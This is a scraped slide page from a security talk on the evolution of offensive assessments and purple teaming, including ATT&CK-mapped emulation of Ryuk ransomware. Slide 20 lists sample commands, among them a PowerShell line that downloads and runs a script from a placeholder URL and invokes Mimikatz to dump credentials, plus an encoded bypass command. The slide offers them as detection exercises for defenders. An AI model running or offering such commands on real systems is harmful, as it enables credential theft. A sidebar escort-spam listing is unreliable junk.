Ryder robertson security-considerations_in_the_supply_chain_2017.11.02Ryder robertson security-considerations_in_the_supply_chain_2017.11.02
Ryder robertson security-considerations_in_the_supply_chain_2017.11.02
 
Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...
Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...
Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...
 
Secure 2019 - APT for Everyone - Adversary Simulations based on ATT&CK Framework
Secure 2019 - APT for Everyone - Adversary Simulations based on ATT&CK FrameworkSecure 2019 - APT for Everyone - Adversary Simulations based on ATT&CK Framework
Secure 2019 - APT for Everyone - Adversary Simulations based on ATT&CK Framework
 
Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...
Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...
Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...
 
RED-TEAM_Conclave
RED-TEAM_ConclaveRED-TEAM_Conclave
RED-TEAM_Conclave
 
Simplifying Security: Protecting Your Clients and Your Company
Simplifying Security: Protecting Your Clients and Your CompanySimplifying Security: Protecting Your Clients and Your Company
Simplifying Security: Protecting Your Clients and Your Company
 
Deep dive nella supply chain della nostra infrastruttura cloud
Deep dive nella supply chain della nostra infrastruttura cloudDeep dive nella supply chain della nostra infrastruttura cloud
Deep dive nella supply chain della nostra infrastruttura cloud
 
2023 NCIT: Introduction to Intrusion Detection
2023 NCIT: Introduction to Intrusion Detection2023 NCIT: Introduction to Intrusion Detection
2023 NCIT: Introduction to Intrusion Detection
 
Getting ready for a Capture The Flag Hacking Competition
Getting ready for a Capture The Flag Hacking CompetitionGetting ready for a Capture The Flag Hacking Competition
Getting ready for a Capture The Flag Hacking Competition
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
 
5 Things You Should Know About Ethical Hacking
5 Things You Should Know About Ethical Hacking5 Things You Should Know About Ethical Hacking
5 Things You Should Know About Ethical Hacking
 
Cyber Threat Hunting Workshop.pdf
Cyber Threat Hunting Workshop.pdfCyber Threat Hunting Workshop.pdf
Cyber Threat Hunting Workshop.pdf
 
Cyber Threat Hunting Workshop.pdf
Cyber Threat Hunting Workshop.pdfCyber Threat Hunting Workshop.pdf
Cyber Threat Hunting Workshop.pdf
 
Understanding and implementing website security
Understanding and implementing website securityUnderstanding and implementing website security
Understanding and implementing website security
 
Adversary Emulation using CALDERA
Adversary Emulation using CALDERAAdversary Emulation using CALDERA
Adversary Emulation using CALDERA
 
Grow Up! Evaluating and Maturing Your SOC using MITRE ATT&CK
Grow Up! Evaluating and Maturing Your SOC using MITRE ATT&CKGrow Up! Evaluating and Maturing Your SOC using MITRE ATT&CK
Grow Up! Evaluating and Maturing Your SOC using MITRE ATT&CK
 
Cyber Threat Hunting Workshop
Cyber Threat Hunting WorkshopCyber Threat Hunting Workshop
Cyber Threat Hunting Workshop
 
SignaturesAreDead Long Live RESILIENT Signatures
SignaturesAreDead Long Live RESILIENT SignaturesSignaturesAreDead Long Live RESILIENT Signatures
SignaturesAreDead Long Live RESILIENT Signatures
 
HackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware AnalysisHackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware Analysis
 
Jackpot! sbancare un atm con ploutus.d
Jackpot! sbancare un atm con ploutus.dJackpot! sbancare un atm con ploutus.d
Jackpot! sbancare un atm con ploutus.d
 

Mais de Jorge Orchilles

C2 Matrix Anniversary - Blackhat EU 2020
C2 Matrix Anniversary - Blackhat EU 2020C2 Matrix Anniversary - Blackhat EU 2020
C2 Matrix Anniversary - Blackhat EU 2020Jorge Orchilles
 
Adversarial Emulation with the C2 Matrix - Wild West WebCastin Fest
Adversarial Emulation with the C2 Matrix - Wild West WebCastin FestAdversarial Emulation with the C2 Matrix - Wild West WebCastin Fest
Adversarial Emulation with the C2 Matrix - Wild West WebCastin FestJorge Orchilles
 
Adversarial Emulation and the C2 Matrix - Presented at Wild West Hackin Fest ...
Adversarial Emulation and the C2 Matrix - Presented at Wild West Hackin Fest ...Adversarial Emulation and the C2 Matrix - Presented at Wild West Hackin Fest ...
Adversarial Emulation and the C2 Matrix - Presented at Wild West Hackin Fest ...Jorge Orchilles
 
C2 Matrix A Comparison of Command and Control Frameworks
C2 Matrix A Comparison of Command and Control FrameworksC2 Matrix A Comparison of Command and Control Frameworks
C2 Matrix A Comparison of Command and Control FrameworksJorge Orchilles
 
Windows Phone 8 Security and Testing WP8 Apps
Windows Phone 8 Security and Testing WP8 AppsWindows Phone 8 Security and Testing WP8 Apps
Windows Phone 8 Security and Testing WP8 AppsJorge Orchilles
 
Vulnerability Ass... Penetrate What?
Vulnerability Ass... Penetrate What?Vulnerability Ass... Penetrate What?
Vulnerability Ass... Penetrate What?Jorge Orchilles
 
BackTrack 4 R2 - SFISSA Presentation
BackTrack 4 R2 - SFISSA PresentationBackTrack 4 R2 - SFISSA Presentation
BackTrack 4 R2 - SFISSA PresentationJorge Orchilles
 
Emerging Threats to Infrastructure
Emerging Threats to InfrastructureEmerging Threats to Infrastructure
Emerging Threats to InfrastructureJorge Orchilles
 

Mais de Jorge Orchilles (9)

C2 Matrix Anniversary - Blackhat EU 2020
C2 Matrix Anniversary - Blackhat EU 2020C2 Matrix Anniversary - Blackhat EU 2020
C2 Matrix Anniversary - Blackhat EU 2020
 
Adversarial Emulation with the C2 Matrix - Wild West WebCastin Fest
Adversarial Emulation with the C2 Matrix - Wild West WebCastin FestAdversarial Emulation with the C2 Matrix - Wild West WebCastin Fest
Adversarial Emulation with the C2 Matrix - Wild West WebCastin Fest
 
Adversarial Emulation and the C2 Matrix - Presented at Wild West Hackin Fest ...
Adversarial Emulation and the C2 Matrix - Presented at Wild West Hackin Fest ...Adversarial Emulation and the C2 Matrix - Presented at Wild West Hackin Fest ...
Adversarial Emulation and the C2 Matrix - Presented at Wild West Hackin Fest ...
 
C2 Matrix A Comparison of Command and Control Frameworks
C2 Matrix A Comparison of Command and Control FrameworksC2 Matrix A Comparison of Command and Control Frameworks
C2 Matrix A Comparison of Command and Control Frameworks
 
Windows Phone 8 Security and Testing WP8 Apps
Windows Phone 8 Security and Testing WP8 AppsWindows Phone 8 Security and Testing WP8 Apps
Windows Phone 8 Security and Testing WP8 Apps
 
Vulnerability Ass... Penetrate What?
Vulnerability Ass... Penetrate What?Vulnerability Ass... Penetrate What?
Vulnerability Ass... Penetrate What?
 
BackTrack 4 R2 - SFISSA Presentation
BackTrack 4 R2 - SFISSA PresentationBackTrack 4 R2 - SFISSA Presentation
BackTrack 4 R2 - SFISSA Presentation
 
Emerging Threats to Infrastructure
Emerging Threats to InfrastructureEmerging Threats to Infrastructure
Emerging Threats to Infrastructure
 
Windows 7 Security
Windows 7 SecurityWindows 7 Security
Windows 7 Security
 

Último

A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024Results
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024The Digital Insurer
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 

Último (20)

A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 

Evolution of Offensive Assessments - SecureWV Conference

  • 2. @JorgeOrchilles T1033 - System Owner/User Discovery ● Chief Technology Officer - SCYTHE ● Purple Team Exercise Framework (PTEF) ● C2 Matrix Co-Creator ● 10 years @ Citi leading offensive security team ● Certified SANS Instructor: SEC560, SEC504 ● Author SEC564: Red Team Exercises and Adversary Emulation ● CVSSv3.1 Working Group Voting Member ● GFMA: Threat-Led Pentest Framework ● ISSA Fellow; NSI Technologist Fellow 2
  • 3. @JorgeOrchilles Evolution of Offensive Security https://www.scythe.io/library/scythes-ethical-hacking-maturity-model 3 ● Based on various organization’s experience ● Not a step-by-step guide, but could serve as a baseline for improvement ● You can skip steps based on business requirements and goals ● Every organization is different ● Continuous improvement should not halt previous assessment types
  • 4. @JorgeOrchilles A Long, Long, Long Time Ago 4 1992 - First commercial firewall 2000 +/- - Firewalls are “common” Networks are flat Remember Windows 95 / NT? What was manual: ● Vulnerabilities in internet facing services (T1190) ● Abusing internet-facing authentication mechanisms (T1133, T1078)
  • 5. @JorgeOrchilles Vulnerability Assessment 5 Vulnerabilities in internet facing services (T1190) Abusing internet-facing authentication mechanisms (T1133, T1078) + Severity
  • 6. @JorgeOrchilles Penetration Testing 6 NOW with 100% MORE EXPLOITATION (and fire)
  • 9. @JorgeOrchilles General Business Value (simplified) 9 Business Value @brysonbort
  • 10. @JorgeOrchilles 10 Exploitation in MITRE ATT&CK 9 techniques w/“exploit” (out of 525)
  • 13. @JorgeOrchilles Red Team 13 Goal: ● Test, measure, and improve people, process, and technology ● Make Blue Team better ● Assure business once a year RECON Access Post-Access “The practice of looking at a problem or situation from the perspective of an adversary” – Red Team Journal
  • 14. @JorgeOrchilles Red Team: Access 1. Exploitable vulnerabilities in internet facing services (T1190) 2. Abusing internet-facing authentication mechanisms (T1133, T1078) 3. Phishing for malware execution (T1192, T1193, T1194; phishing for credentials is really just #2 above) 4. Gaining physical access to a network and connecting a rogue device (T1200, T1091) 5. Supply Chain Attacks (T1195, T1199) 14 https://medium.com/@malcomvetter/how-we-breached-your-network-755e40f52d85
  • 15. @JorgeOrchilles Red Team: Assumed Breach 15 RECON Access Post-Access Business Value @timmedin
  • 17. @JorgeOrchilles Toward a Purple Team https://www.scythe.io/ptef
  • 18. @JorgeOrchilles Purple Team Exercises 18 ● Virtual, functional team where teams work together to measure and improve defensive security posture (people, process, and technology) ○ CTI provides threat actor with capability, intent, and opportunity to attack ○ Red Team creates adversary emulation plan ○ Tabletop discussion with defenders about the attacker tactics, techniques, and procedures (TTPs) and expected defenses ○ Emulation of each adversary behavior (TTPs) ○ Blue Team looks for indicators of behavior and/or improvement opportunities ○ Red and Blue work together to create remediation action plan ○ Repeat for next set of TTPs
  • 19. @JorgeOrchilles Blue Team 19 ● Log ○ Relevant Events ○ Locally ○ Central Log Aggregator ● Alert ○ Severity ● Respond ○ Process ○ People ○ Automation ● Definition: ○ Defenders in an organization entrusted with identifying and remediating attacks. ○ Generally associated with Security Operations Center or Managed Security Service Provider (MSSP), Hunt Team, Incident Response, and Digital Forensics, Managed Detection and Response (MDR). ○ Really, it is everyone's responsibility! ● Goal: ○ Identify, contain, eradicate attacks
  • 20. @JorgeOrchilles Single TTP? ● What is the expected Blue Team log, alert, and/or response from: ○ whoami - T1033; T1059.003 ○ ipconfig - T1016; T1059.003 ○ powershell whoami - T1033; T1059.001 ○ powershell -exec bypass -nop -enc dwBoAG8AYQBtAGkA - T1033; T1132.001; T1059.001 ○ powershell "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds" - T1003; T1059.001; T1098; T1555; T1558 ● Each procedure can, and most likely will, include multiple TTPs ● Adversary is not going to just perform the one TTP ● Let’s chain these TTPs together to create an attack chain 20
  • 21. @JorgeOrchilles Adversary Emulation ● Definition: ○ A type of Red Team exercise where the Red Team emulates how an adversary operates, following the same tactics, techniques, and procedures (TTPs), with a specific objective similar to those of realistic threats or adversaries. ○ Leverage Cyber Threat Intelligence to emulate an attacker likely to attack the organization ● Goal: ○ Emulate an adversary attack chain or scenario ○ Understand organization’s preparedness if under a real, sophisticated attack ● Effort: ○ Manual ● Customer: ○ Entire organization 21 https://medium.com/@jorgeorchilles/ethical-hacking-definitions-9b9a6dad4988
  • 22. @JorgeOrchilles #ThreatThursday ● Choose an adversary ○ Introduce Adversary and consume CTI ○ Map to MITRE ATT&CK w/Navigator Layer ○ Create Adversary Emulation Plan ○ Share the plan on SCYTHE Community Threat Github: https://github.com/scythe-io/community-threats/ ○ Emulate Adversary with video ○ How to defend against adversary ● All free for the community: https://www.scythe.io/threatthursday ● Let’s look at Ryuk: https://www.scythe.io/library/threatthursday-ryuk 22
  • 24. @JorgeOrchilles Ugh… Ransomware? Boring! But wait… $$ ● Get access to a target system or network (targeted or opportunist) ● Encrypt files - 3 methods: a. Read the file, create an encrypted version of the file, replace the original file with the encrypted one b. Use raw disk access for encryption c. Open the file, encrypt the contents and save the file (no file deletion or creation) ● Steal the files? Sometimes ● Download a ransom note asking for payment in crypto or else!!! ● Get PAID!!! $$$ ฿฿฿ ₿₿₿ 24
  • 26. @JorgeOrchilles Consume CTI ● https://thedfirreport.com/2020/10/08/ryuks-return/ ● https://research.checkpoint.com/2018/ryuk-ransomware-targeted-campaign- break/ ● https://blog.malwarebytes.com/threat-spotlight/2019/12/threat-spotlight-the -curious-case-of-ryuk-ransomware/ ● https://unit42.paloaltonetworks.com/atoms/ryuk-ransomware/ ● https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware- outbreak/ 26
  • 27. @JorgeOrchilles Ryuk TTPs 27 Tactic Description Command and Control T1071 - Application Layer Protocol; T1105 - Ingress Tool Transfer; T1219 - Remote Access Software; T1573 - Encrypted Channel Execution T1059 - Command and Scripting Interpreter; T1059.001 - PowerShell; T1059.003 - Windows Command Shell; T1053 - Scheduled Task/Job; T1053.005 - Scheduled Task Defense Evasion T1078 - Valid Accounts; T1078.003 - Local Accounts; T1140 - Deobfuscate/Decode Files or Information Discovery T1018 - Remote System Discovery; T1057 - Process Discovery; T1082 - System Information Discovery; T1083 - File and Directory Discovery; T1087 - Account Discovery; T1087.002 - Domain Account; T1482 - Domain Trust Discovery Credential Access T1003 - OS Credential Dumping; T1003.001 - LSASS Memory Persistence T1547 - Boot or Logon Autostart Execution; T1547.001 - Registry Run Keys / Startup Folder Collection T1074 - Data Staged Exfiltration T1041 - Exfiltration Over C2 Channel Impact T1486 - Data Encrypted for Impact
  • 29. @JorgeOrchilles Attack Tools: C2 Matrix ● Collaborative Evaluation ● Google Sheet of C2s ○ 58 frameworks ● www.thec2matrix.com ● FOLLOW @C2_Matrix ● SANS Slingshot C2 Matrix 29
  • 30. @JorgeOrchilles Attack Infrastructure with RedELK 30 ● RedELK - centralized logging for Red Team and White Cell ● Also amazing graph for this talk ->> ● https://github.com/outflan knl/RedELK/ ● Created by Marc/Outflank: ○ @MarcOverIP ○ @OutflankNL
  • 32. @JorgeOrchilles adf.bat ● Downloads AdFind.exe ○ Used by FIN6 and others ● Runs AdFind.exe as adf.bat ● Saves output to disk 32
  • 34. @JorgeOrchilles Emulating Ransomware? ● Is emulating ransomware even possible? ● Of course it is! ● The secret is to not encrypt or destroy production data. ● Instead create new files before emulating typical ransomware steps of encrypting, exfiltrating, and obtaining a ransom note. ● This method ensures no data is ever at risk of being encrypted, destroyed, or leaked. 34
  • 35. @JorgeOrchilles SHOW VALUE!!!! ● That is what we are here for… providing business value! ● Use VECTR to propose your Adversary Emulation Plan ● Track each engagement, each improvement, each blue team and red team win! ● Show improvement over time ● This will make you part of a Program including people, process, and technology 35 https://vectr.io/
  • 36. @JorgeOrchilles Other considerations ● It's okay to deviate from plan to accomplish objective ● TTPs from MITRE ATT&CK are dated ○ Must be seen in the wild first; they can be years old ● Security tools/processes make some TTPs very difficult to pull off ○ This is okay, document the good and the bad ○ Give credit when and where due ● Avoiding Heartbeat Detection - 30 mins seems to be current magic # ● Everything done here today was with free tools ○ You may want to consider enterprise tools, for your enterprise. 36
  • 37. @JorgeOrchilles More Free Stuff: Caldera https://github.com/mitre/caldera https://caldera.readthedocs.io/en/latest/ 37
  • 38. @JorgeOrchilles Shameless Plugs ● Hands-On Purple Team Workshop - November 12 ○ Sign up: http://scythe.io/workshops ● SEC564 Live Online - https://sans.org/sec564 ○ HackFest - November 16-17 ● Purple Team Summit - November 13 ○ https://www.scythe.io/purple-team-summit 38
  • 39. @JorgeOrchilles References 39 ● Ethical Hacking Maturity Model: https://www.scythe.io/library/scythes-ethical-hacking-maturity-model ● Definitions: https://medium.com/@jorgeorchilles/ethical-hacking-definitions-9b9a6dad4988 ● Cyber Defense Matrix: https://cyberdefensematrix.com/ ● Purple Team Exercise Framework: https://www.scythe.io/ptef ● #ThreatThursday: https://www.scythe.io/threatthursday ● Ryuk: https://www.scythe.io/library/threatthursday-ryuk ● C2 Matrix: https://thec2matrix.com https://howto.thec2matrix.com ● RedELK: https://github.com/outflanknl/RedELK/ ● VECTR: https://vectr.io/ ● SCYTHE emulation plans: https://github.com/scythe-io/community-threats/ ● Caldera: https://github.com/mitre/caldera